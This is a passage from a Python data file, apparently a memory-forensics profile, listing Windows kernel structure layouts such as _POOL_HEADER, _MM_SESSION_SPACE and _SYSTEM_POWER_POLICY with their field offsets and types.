'FrequencyPercentage' : [ 0x1, ['unsigned char']],
} ],
'_PROC_HISTORY_ENTRY' : [ 0x4, {
'Utility' : [ 0x0, ['unsigned short']],
'Frequency' : [ 0x2, ['unsigned char']],
'Reserved' : [ 0x3, ['unsigned char']],
} ],
'_RTL_RANGE' : [ 0x20, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
'UserData' : [ 0x10, ['pointer', ['void']]],
'Owner' : [ 0x14, ['pointer', ['void']]],
'Attributes' : [ 0x18, ['unsigned char']],
'Flags' : [ 0x19, ['unsigned char']],
} ],
'_SYSTEM_POWER_POLICY' : [ 0xe8, {
'Revision' : [ 0x0, ['unsigned long']],
'PowerButton' : [ 0x4, ['POWER_ACTION_POLICY']],
'SleepButton' : [ 0x10, ['POWER_ACTION_POLICY']],
'LidClose' : [ 0x1c, ['POWER_ACTION_POLICY']],
'LidOpenWake' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'Reserved' : [ 0x2c, ['unsigned long']],
'Idle' : [ 0x30, ['POWER_ACTION_POLICY']],
'IdleTimeout' : [ 0x3c, ['unsigned long']],
'IdleSensitivity' : [ 0x40, ['unsigned char']],
'DynamicThrottle' : [ 0x41, ['unsigned char']],
'Spare2' : [ 0x42, ['array', 2, ['unsigned char']]],
'MinSleep' : [ 0x44, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'MaxSleep' : [ 0x48, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'ReducedLatencySleep' : [ 0x4c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'WinLogonFlags' : [ 0x50, ['unsigned long']],
'Spare3' : [ 0x54, ['unsigned long']],
'DozeS4Timeout' : [ 0x58, ['unsigned long']],
'BroadcastCapacityResolution' : [ 0x5c, ['unsigned long']],
'DischargePolicy' : [ 0x60, ['array', 4, ['SYSTEM_POWER_LEVEL']]],
'VideoTimeout' : [ 0xc0, ['unsigned long']],
'VideoDimDisplay' : [ 0xc4, ['unsigned char']],
'VideoReserved' : [ 0xc8, ['array', 3, ['unsigned long']]],
'SpindownTimeout' : [ 0xd4, ['unsigned long']],
'OptimizeForPower' : [ 0xd8, ['unsigned char']],
'FanThrottleTolerance' : [ 0xd9, ['unsigned char']],
'ForcedThrottle' : [ 0xda, ['unsigned char']],
'MinThrottle' : [ 0xdb, ['unsigned char']],
'OverThrottled' : [ 0xdc, ['POWER_ACTION_POLICY']],
} ],
'_POOL_HEADER' : [ 0x8, {
'PreviousSize' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned short')]],
'PoolIndex' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 16, native_type='unsigned short')]],
'BlockSize' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned short')]],
'PoolType' : [ 0x2, ['BitField', dict(start_bit = 9, end_bit = 16, native_type='unsigned short')]],
'Ulong1' : [ 0x0, ['unsigned long']],
'PoolTag' : [ 0x4, ['unsigned long']],
'AllocatorBackTraceIndex' : [ 0x4, ['unsigned short']],
'PoolTagHash' : [ 0x6, ['unsigned short']],
} ],
'_ETW_PROVIDER_TABLE_ENTRY' : [ 0x10, {
'RefCount' : [ 0x0, ['long']],
'State' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'EtwProviderStateFree', 1: 'EtwProviderStateTransition', 2: 'EtwProviderStateActive', 3: 'EtwProviderStateMax'})]],
'RegEntry' : [ 0x8, ['pointer', ['_ETW_REG_ENTRY']]],
'Caller' : [ 0xc, ['pointer', ['void']]],
} ],
'_SE_AUDIT_PROCESS_CREATION_INFO' : [ 0x4, {
'ImageFileName' : [ 0x0, ['pointer', ['_OBJECT_NAME_INFORMATION']]],
} ],
'_HEAP_ENTRY_EXTRA' : [ 0x8, {
'AllocatorBackTraceIndex' : [ 0x0, ['unsigned short']],
'TagIndex' : [ 0x2, ['unsigned short']],
'Settable' : [ 0x4, ['unsigned long']],
'ZeroInit' : [ 0x0, ['unsigned long long']],
} ],
'_VF_POOL_TRACE' : [ 0x40, {
'Address' : [ 0x0, ['pointer', ['void']]],
'Size' : [ 0x4, ['unsigned long']],
'Thread' : [ 0x8, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0xc, ['array', 13, ['pointer', ['void']]]],
} ],
'__unnamed_20df' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x0, ['_MM_SESSION_SPACE_FLAGS']],
} ],
'_MM_SESSION_SPACE' : [ 0x2000, {
'ReferenceCount' : [ 0x0, ['long']],
'u' : [ 0x4, ['__unnamed_20df']],
'SessionId' : [ 0x8, ['unsigned long']],
'ProcessReferenceToSession' : [ 0xc, ['long']],
'ProcessList' : [ 0x10, ['_LIST_ENTRY']],
'LastProcessSwappedOutTime' : [ 0x18, ['_LARGE_INTEGER']],
'SessionPageDirectoryIndex' : [ 0x20, ['unsigned long']],
'NonPagablePages' : [ 0x24, ['unsigned long']],
'CommittedPages' : [ 0x28, ['unsigned long']],
'PagedPoolStart' : [ 0x2c, ['pointer', ['void']]],
'PagedPoolEnd' : [ 0x30, ['pointer', ['void']]],
'SessionObject' : [ 0x34, ['pointer', ['void']]],
'SessionObjectHandle' : [ 0x38, ['pointer', ['void']]],
'ResidentProcessCount' : [ 0x3c, ['long']],
'SessionPoolAllocationFailures' : [ 0x40, ['array', 4, ['unsigned long']]],
'ImageList' : [ 0x50, ['_LIST_ENTRY']],
'LocaleId' : [ 0x58, ['unsigned long']],
'AttachCount' : [ 0x5c, ['unsigned long']],
'AttachGate' : [ 0x60, ['_KGATE']],
'WsListEntry' : [ 0x70, ['_LIST_ENTRY']],
'Lookaside' : [ 0x80, ['array', 25, ['_GENERAL_LOOKASIDE']]],
'Session' : [ 0xd00, ['_MMSESSION']],
'PagedPoolInfo' : [ 0xd38, ['_MM_PAGED_POOL_INFO']],
'Vm' : [ 0xd70, ['_MMSUPPORT']],
'Wsle' : [ 0xddc, ['pointer', ['_MMWSLE']]],
'DriverUnload' : [ 0xde0, ['pointer', ['void']]],
'PagedPool' : [ 0xe00, ['_POOL_DESCRIPTOR']],
'PageTables' : [ 0x1f40, ['pointer', ['_MMPTE']]],
'SpecialPool' : [ 0x1f44, ['_MI_SPECIAL_POOL']],
'SessionPteLock' : [ 0x1f68, ['_KGUARDED_MUTEX']],
'PoolBigEntriesInUse' : [ 0x1f88, ['long']],
'PagedPoolPdeCount' : [ 0x1f8c, ['unsigned long']],
'SpecialPoolPdeCount' : [ 0x1f90, ['unsigned long']],
'DynamicSessionPdeCount' : [ 0x1f94, ['unsigned long']],
'SystemPteInfo' : [ 0x1f98, ['_MI_SYSTEM_PTE_TYPE']],
'PoolTrackTableExpansion' : [ 0x1fc8, ['pointer', ['void']]],
'PoolTrackTableExpansionSize' : [ 0x1fcc, ['unsigned long']],
'PoolTrackBigPages' : [ 0x1fd0, ['pointer', ['void']]],
'PoolTrackBigPagesSize' : [ 0x1fd4, ['unsigned long']],
'IoState' : [ 0x1fd8, ['Enumeration', dict(target = 'long', choices = {1: 'IoSessionStateCreated', 2: 'IoSessionStateInitialized', 3: 'IoSessionStateConnected', 4: 'IoSessionStateDisconnected', 5: 'IoSessionStateDisconnectedLoggedOn', 6: 'IoSessionStateLoggedOn', 7: 'IoSessionStateLoggedOff', 8: 'IoSessionStateTerminated', 9: 'IoSessionStateMax'})]],
'IoStateSequence' : [ 0x1fdc, ['unsigned long']],
'IoNotificationEvent' : [ 0x1fe0, ['_KEVENT']],
'SessionPoolPdes' : [ 0x1ff0, ['_RTL_BITMAP']],
'CpuQuotaBlock' : [ 0x1ff8, ['pointer', ['_PS_CPU_QUOTA_BLOCK']]],
} ],
'_OBJECT_HANDLE_COUNT_ENTRY' : [ 0x8, {
'Process' : [ 0x0, ['pointer', ['_EPROCESS']]],
'HandleCount' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 24, native_type='unsigned long')]],
'LockCount' : [ 0x4, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'_CLIENT_ID' : [ 0x8, {
'UniqueProcess' : [ 0x0, ['pointer', ['void']]],
'UniqueThread' : [ 0x4, ['pointer', ['void']]],
} ],
'_WHEA_MEMORY_ERROR_SECTION' : [ 0x49, {
'ValidBits' : [ 0x0, ['_WHEA_MEMORY_ERROR_SECTION_VALIDBITS']],
'ErrorStatus' : [ 0x8, ['_WHEA_ERROR_STATUS']],
'PhysicalAddress' : [ 0x10, ['unsigned long long']],
'PhysicalAddressMask' : [ 0x18, ['unsigned long long']],
'Node' : [ 0x20, ['unsigned short']],
'Card' : [ 0x22, ['unsigned short']],
'Module' : [ 0x24, ['unsigned short']],
'Bank' : [ 0x26, ['unsigned short']],
'Device' : [ 0x28, ['unsigned short']],
'Row' : [ 0x2a, ['unsigned short']],
'Column' : [ 0x2c, ['unsigned short']],
'BitPosition' : [ 0x2e, ['unsigned short']],
'RequesterId' : [ 0x30, ['unsigned long long']],
'ResponderId' : [ 0x38, ['unsigned long long']],
'TargetId' : [ 0x40, ['unsigned long long']],
'ErrorType' : [ 0x48, ['unsigned char']],
} ],
'_KWAIT_STATUS_REGISTER' : [ 0x1, {
'Flags' : [ 0x0, ['unsigned char']],
'State' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned char')]],
'Affinity' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Priority' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Apc' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'UserApc' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'Alert' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'Unused' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
} ],
'_VI_DEADLOCK_RESOURCE' : [ 0x80, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'VfDeadlockUnknown', 1: 'VfDeadlockMutex', 2: 'VfDeadlockMutexAbandoned', 3: 'VfDeadlockFastMutex', 4: 'VfDeadlockFastMutexUnsafe', 5: 'VfDeadlockSpinLock', 6: 'VfDeadlockInStackQueuedSpinLock', 7: 'VfDeadlockUnusedSpinLock', 8: 'VfDeadlockEresource', 9: 'VfDeadlockTypeMaximum'})]],
'NodeCount' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'RecursionCount' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 32, native_type='unsigned long')]],
'ResourceAddress' : [ 0x8, ['pointer', ['void']]],
'ThreadOwner' : [ 0xc, ['pointer', ['_VI_DEADLOCK_THREAD']]],
'ResourceList' : [ 0x10, ['_LIST_ENTRY']],
'HashChainList' : [ 0x18, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x18, ['_LIST_ENTRY']],
'StackTrace' : [ 0x20, ['array', 8, ['pointer', ['void']]]],
'LastAcquireTrace' : [ 0x40, ['array', 8, ['pointer', ['void']]]],
'LastReleaseTrace' : [ 0x60, ['array', 8, ['pointer', ['void']]]],
} ],
'_DBGKD_GET_SET_BUS_DATA' : [ 0x14, {
'BusDataType' : [ 0x0, ['unsigned long']],
'BusNumber' : [ 0x4, ['unsigned long']],
'SlotNumber' : [ 0x8, ['unsigned long']],
'Offset' : [ 0xc, ['unsigned long']],
'Length' : [ 0x10, ['unsigned long']],
} ],
'_MMSECTION_FLAGS' : [ 0x4, {
'BeingDeleted' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'BeingCreated' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'BeingPurged' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'NoModifiedWriting' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'FailAllIo' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Image' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Based' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'File' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'Networked' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'Rom' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'PhysicalMemory' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'Reserve' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'Commit' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'Accessed' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'WasPurged' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'UserReference' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'GlobalMemory' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'DeleteOnClose' : [ 0x0, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'FilePointerNull' : [ 0x0, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'GlobalOnlyPerSession' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'SetMappedFileIoComplete' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'CollidedFlush' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'NoChange' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long')]],
'UserWritable' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'PreferredNode' : [ 0x0, ['BitField', dict(start_bit = 26, end_bit = 32, native_type='unsigned long')]],
} ],
'_SECURITY_CLIENT_CONTEXT' : [ 0x3c, {
'SecurityQos' : [ 0x0, ['_SECURITY_QUALITY_OF_SERVICE']],
'ClientToken' : [ 0xc, ['pointer', ['void']]],
'DirectlyAccessClientToken' : [ 0x10, ['unsigned char']],
'DirectAccessEffectiveOnly' : [ 0x11, ['unsigned char']],
'ServerIsRemote' : [ 0x12, ['unsigned char']],
'ClientTokenControl' : [ 0x14, ['_TOKEN_CONTROL']],
} ],
'_MM_PAGED_POOL_INFO' : [ 0x38, {
'Mutex' : [ 0x0, ['_KGUARDED_MUTEX']],
'PagedPoolAllocationMap' : [ 0x20, ['_RTL_BITMAP']],
'FirstPteForPagedPool' : [ 0x28, ['pointer', ['_MMPTE']]],
'PagedPoolHint' : [ 0x2c, ['unsigned long']],
'PagedPoolCommit' : [ 0x30, ['unsigned long']],
'AllocatedPagedPool' : [ 0x34, ['unsigned long']],
} ],
'_BITMAP_RANGE' : [ 0x20, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'BasePage' : [ 0x8, ['long long']],
'FirstDirtyPage' : [ 0x10, ['unsigned long']],
'LastDirtyPage' : [ 0x14, ['unsigned long']],
'DirtyPages' : [ 0x18, ['unsigned long']],
'Bitmap' : [ 0x1c, ['pointer', ['unsigned long']]],
} ],
'_IO_SECURITY_CONTEXT' : [ 0x10, {
'SecurityQos' : [ 0x0, ['pointer', ['_SECURITY_QUALITY_OF_SERVICE']]],
'AccessState' : [ 0x4, ['pointer', ['_ACCESS_STATE']]],
'DesiredAccess' : [ 0x8, ['unsigned long']],
'FullCreateOptions' : [ 0xc, ['unsigned long']],
} ],
'_PROC_PERF_DOMAIN' : [ 0x78, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'Master' : [ 0x8, ['pointer', ['_KPRCB']]],
'Members' : [ 0xc, ['_KAFFINITY_EX']],
'FeedbackHandler' : [ 0x18, ['pointer', ['void']]],
'GetFFHThrottleState' : [ 0x1c, ['pointer', ['void']]],
'BoostPolicyHandler' : [ 0x20, ['pointer', ['void']]],
'PerfSelectionHandler' : [ 0x24, ['pointer', ['void']]],
'PerfHandler' : [ 0x28, ['pointer', ['void']]],
'Processors' : [ 0x2c, ['pointer', ['_PROC_PERF_CONSTRAINT']]],
'PerfChangeTime' : [ 0x30, ['unsigned long long']],
'ProcessorCount' : [ 0x38, ['unsigned long']],
'PreviousFrequencyMhz' : [ 0x3c, ['unsigned long']],
'CurrentFrequencyMhz' : [ 0x40, ['unsigned long']],
'PreviousFrequency' : [ 0x44, ['unsigned long']],
'CurrentFrequency' : [ 0x48, ['unsigned long']],
'CurrentPerfContext' : [ 0x4c, ['unsigned long']],
'DesiredFrequency' : [ 0x50, ['unsigned long']],
'MaxFrequency' : [ 0x54, ['unsigned long']],
'MinPerfPercent' : [ 0x58, ['unsigned long']],
'MinThrottlePercent' : [ 0x5c, ['unsigned long']],
'MaxPercent' : [ 0x60, ['unsigned long']],
'MinPercent' : [ 0x64, ['unsigned long']],
'ConstrainedMaxPercent' : [ 0x68, ['unsigned long']],
'ConstrainedMinPercent' : [ 0x6c, ['unsigned long']],
'Coordination' : [ 0x70, ['unsigned char']],
'PerfChangeIntervalCount' : [ 0x74, ['long']],
} ],
'_X86_DBGKD_CONTROL_SET' : [ 0x10, {
'TraceFlag' : [ 0x0, ['unsigned long']],
'Dr7' : [ 0x4, ['unsigned long']],
'CurrentSymbolStart' : [ 0x8, ['unsigned long']],
'CurrentSymbolEnd' : [ 0xc, ['unsigned long']],
} ],
'_HANDLE_TRACE_DB_ENTRY' : [ 0x50, {
'ClientId' : [ 0x0, ['_CLIENT_ID']],
'Handle' : [ 0x8, ['pointer', ['void']]],
'Type' : [ 0xc, ['unsigned long']],
'StackTrace' : [ 0x10, ['array', 16, ['pointer', ['void']]]],
} ],
'_TP_NBQ_GUARD' : [ 0x10, {
'GuardLinks' : [ 0x0, ['_LIST_ENTRY']],
'Guards' : [ 0x8, ['array', 2, ['pointer', ['void']]]],
} ],
'_DUMMY_FILE_OBJECT' : [ 0xa0, {
'ObjectHeader' : [ 0x0, ['_OBJECT_HEADER']],
'FileObjectBody' : [ 0x20, ['array', 128, ['unsigned char']]],
} ],
'_POP_TRIGGER_WAIT' : [ 0x20, {
'Event' : [ 0x0, ['_KEVENT']],
'Status' : [ 0x10, ['long']],
'Link' : [ 0x14, ['_LIST_ENTRY']],
'Trigger' : [ 0x1c, ['pointer', ['_POP_ACTION_TRIGGER']]],
} ],
'_RELATION_LIST' : [ 0x14, {
'Count' : [ 0x0, ['unsigned long']],
'TagCount' : [ 0x4, ['unsigned long']],
'FirstLevel' : [ 0x8, ['unsigned long']],
'MaxLevel' : [ 0xc, ['unsigned long']],
'Entries' : [ 0x10, ['array', 1, ['pointer', ['_RELATION_LIST_ENTRY']]]],
} ],
'_IO_TIMER' : [ 0x18, {
'Type' : [ 0x0, ['short']],
'TimerFlag' : [ 0x2, ['short']],
'TimerList' : [ 0x4, ['_LIST_ENTRY']],
'TimerRoutine' : [ 0xc, ['pointer', ['void']]],
'Context' : [ 0x10, ['pointer', ['void']]],
'DeviceObject' : [ 0x14, ['pointer', ['_DEVICE_OBJECT']]],
} ],
'_ARBITER_TEST_ALLOCATION_PARAMETERS' : [ 0xc, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'AllocateFromCount' : [ 0x4, ['unsigned long']],
'AllocateFrom' : [ 0x8, ['pointer', ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
} ],
'_MI_SPECIAL_POOL' : [ 0x24, {
'PteBase' : [ 0x0, ['pointer', ['_MMPTE']]],
'Lock' : [ 0x4, ['unsigned long']],
'Paged' : [ 0x8, ['_MI_SPECIAL_POOL_PTE_LIST']],
'NonPaged' : [ 0x10, ['_MI_SPECIAL_POOL_PTE_LIST']],
'PagesInUse' : [ 0x18, ['long']],
'SpecialPoolPdes' : [ 0x1c, ['_RTL_BITMAP']],
} ],
'_ARBITER_QUERY_CONFLICT_PARAMETERS' : [ 0x10, {
'PhysicalDeviceObject' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
'ConflictingResource' : [ 0x4, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'ConflictCount' : [ 0x8, ['pointer', ['unsigned long']]],
'Conflicts' : [ 0xc, ['pointer', ['pointer', ['_ARBITER_CONFLICT_INFO']]]],
} ],
'_PHYSICAL_MEMORY_DESCRIPTOR' : [ 0x10, {
'NumberOfRuns' : [ 0x0, ['unsigned long']],
'NumberOfPages' : [ 0x4, ['unsigned long']],
'Run' : [ 0x8, ['array', 1, ['_PHYSICAL_MEMORY_RUN']]],
} ],
'_PNP_DEVICE_EVENT_LIST' : [ 0x4c, {
'Status' : [ 0x0, ['long']],
'EventQueueMutex' : [ 0x4, ['_KMUTANT']],
'Lock' : [ 0x24, ['_KGUARDED_MUTEX']],
'List' : [ 0x44, ['_LIST_ENTRY']],
} ],
'_MAILSLOT_CREATE_PARAMETERS' : [ 0x18, {
'MailslotQuota' : [ 0x0, ['unsigned long']],
'MaximumMessageSize' : [ 0x4, ['unsigned long']],
'ReadTimeout' : [ 0x8, ['_LARGE_INTEGER']],
'TimeoutSpecified' : [ 0x10, ['unsigned char']],
} ],
'_PO_IRP_MANAGER' : [ 0x10, {
'DeviceIrpQueue' : [ 0x0, ['_PO_IRP_QUEUE']],
'SystemIrpQueue' : [ 0x8, ['_PO_IRP_QUEUE']],
} ],
'_PPM_PERF_STATE' : [ 0x28, {
'Frequency' : [ 0x0, ['unsigned long']],
'Power' : [ 0x4, ['unsigned long']],
'PercentFrequency' : [ 0x8, ['unsigned char']],
'IncreaseLevel' : [ 0x9, ['unsigned char']],
'DecreaseLevel' : [ 0xa, ['unsigned char']],
'Type' : [ 0xb, ['unsigned char']],
'Control' : [ 0x10, ['unsigned long long']],
'Status' : [ 0x18, ['unsigned long long']],
'TotalHitCount' : [ 0x20, ['unsigned long']],
'DesiredCount' : [ 0x24, ['unsigned long']],
} ],
'_PPM_FFH_THROTTLE_STATE_INFO' : [ 0x20, {
'EnableLogging' : [ 0x0, ['unsigned char']],
'MismatchCount' : [ 0x4, ['unsigned long']],
'Initialized' : [ 0x8, ['unsigned char']],
'LastValue' : [ 0x10, ['unsigned long long']],
'LastLogTickCount' : [ 0x18, ['_LARGE_INTEGER']],
} ],
'_SECURITY_DESCRIPTOR_RELATIVE' : [ 0x14, {
'Revision' : [ 0x0, ['unsigned char']],
'Sbz1' : [ 0x1, ['unsigned char']],
'Control' : [ 0x2, ['unsigned short']],
'Owner' : [ 0x4, ['unsigned long']],
'Group' : [ 0x8, ['unsigned long']],
'Sacl' : [ 0xc, ['unsigned long']],
'Dacl' : [ 0x10, ['unsigned long']],
} ],
'_CLIENT_ID64' : [ 0x10, {
'UniqueProcess' : [ 0x0, ['unsigned long long']],
'UniqueThread' : [ 0x8, ['unsigned long long']],
} ],
'_KDPC_DATA' : [ 0x14, {
'DpcListHead' : [ 0x0, ['_LIST_ENTRY']],
'DpcLock' : [ 0x8, ['unsigned long']],
'DpcQueueDepth' : [ 0xc, ['long']],
'DpcCount' : [ 0x10, ['unsigned long']],
} ],
'_NAMED_PIPE_CREATE_PARAMETERS' : [ 0x28, {
'NamedPipeType' : [ 0x0, ['unsigned long']],
'ReadMode' : [ 0x4, ['unsigned long']],
'CompletionMode' : [ 0x8, ['unsigned long']],
'MaximumInstances' : [ 0xc, ['unsigned long']],
'InboundQuota' : [ 0x10, ['unsigned long']],
'OutboundQuota' : [ 0x14, ['unsigned long']],
'DefaultTimeout' : [ 0x18, ['_LARGE_INTEGER']],
'TimeoutSpecified' : [ 0x20, ['unsigned char']],
} ],
'_CM_BIG_DATA' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned short']],
'Count' : [ 0x2, ['unsigned short']],
'List' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_216f' : [ 0x8, {
'UserData' : [ 0x0, ['pointer', ['void']]],
'Owner' : [ 0x4, ['pointer', ['void']]],
} ],
'__unnamed_2171' : [ 0x8, {
'ListHead' : [ 0x0, ['_LIST_ENTRY']],
} ],
'_RTLP_RANGE_LIST_ENTRY' : [ 0x28, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
'Allocated' : [ 0x10, ['__unnamed_216f']],
'Merged' : [ 0x10, ['__unnamed_2171']],
'Attributes' : [ 0x18, ['unsigned char']],
'PublicFlags' : [ 0x19, ['unsigned char']],
'PrivateFlags' : [ 0x1a, ['unsigned short']],
'ListEntry' : [ 0x1c, ['_LIST_ENTRY']],
} ],
'_ALPC_COMPLETION_PACKET_LOOKASIDE_ENTRY' : [ 0xc, {
'ListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Packet' : [ 0x4, ['pointer', ['_IO_MINI_COMPLETION_PACKET_USER']]],
'Lookaside' : [ 0x8, ['pointer', ['_ALPC_COMPLETION_PACKET_LOOKASIDE']]],
} ],
'__unnamed_2179' : [ 0x2, {
'AsUSHORT' : [ 0x0, ['unsigned short']],
'AllowScaling' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'Disabled' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 16, native_type='unsigned short')]],
} ],
'PROCESSOR_IDLESTATE_POLICY' : [ 0x20, {
'Revision' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['__unnamed_2179']],
'PolicyCount' : [ 0x4, ['unsigned long']],
'Policy' : [ 0x8, ['array', 3, ['PROCESSOR_IDLESTATE_INFO']]],
} ],
'_ACTIVATION_CONTEXT_STACK' : [ 0x18, {
'ActiveFrame' : [ 0x0, ['pointer', ['_RTL_ACTIVATION_CONTEXT_STACK_FRAME']]],
'FrameListCache' : [ 0x4, ['_LIST_ENTRY']],
'Flags' : [ 0xc, ['unsigned long']],
'NextCookieSequenceNumber' : [ 0x10, ['unsigned long']],
'StackId' : [ 0x14, ['unsigned long']],
} ],
'_MSUBSECTION' : [ 0x38, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'SubsectionBase' : [ 0x4, ['pointer', ['_MMPTE']]],
'NextSubsection' : [ 0x8, ['pointer', ['_SUBSECTION']]],
'NextMappedSubsection' : [ 0x8, ['pointer', ['_MSUBSECTION']]],
'PtesInSubsection' : [ 0xc, ['unsigned long']],
'UnusedPtes' : [ 0x10, ['unsigned long']],
'GlobalPerSessionHead' : [ 0x10, ['pointer', ['_MM_AVL_TABLE']]],
'u' : [ 0x14, ['__unnamed_1ef2']],
'StartingSector' : [ 0x18, ['unsigned long']],
'NumberOfFullSectors' : [ 0x1c, ['unsigned long']],
'u1' : [ 0x20, ['__unnamed_1f80']],
'LeftChild' : [ 0x24, ['pointer', ['_MMSUBSECTION_NODE']]],
'RightChild' : [ 0x28, ['pointer', ['_MMSUBSECTION_NODE']]],
'DereferenceList' : [ 0x2c, ['_LIST_ENTRY']],
'NumberOfMappedViews' : [ 0x34, ['unsigned long']],
} ],
'_RTL_DRIVE_LETTER_CURDIR' : [ 0x10, {
'Flags' : [ 0x0, ['unsigned short']],
'Length' : [ 0x2, ['unsigned short']],
'TimeStamp' : [ 0x4, ['unsigned long']],
'DosPath' : [ 0x8, ['_STRING']],
} ],
'_VIRTUAL_EFI_RUNTIME_SERVICES' : [ 0x38, {
'GetTime' : [ 0x0, ['unsigned long']],
'SetTime' : [ 0x4, ['unsigned long']],
'GetWakeupTime' : [ 0x8, ['unsigned long']],
'SetWakeupTime' : [ 0xc, ['unsigned long']],
'SetVirtualAddressMap' : [ 0x10, ['unsigned long']],
'ConvertPointer' : [ 0x14, ['unsigned long']],
'GetVariable' : [ 0x18, ['unsigned long']],
'GetNextVariableName' : [ 0x1c, ['unsigned long']],
'SetVariable' : [ 0x20, ['unsigned long']],
'GetNextHighMonotonicCount' : [ 0x24, ['unsigned long']],
'ResetSystem' : [ 0x28, ['unsigned long']],
'UpdateCapsule' : [ 0x2c, ['unsigned long']],
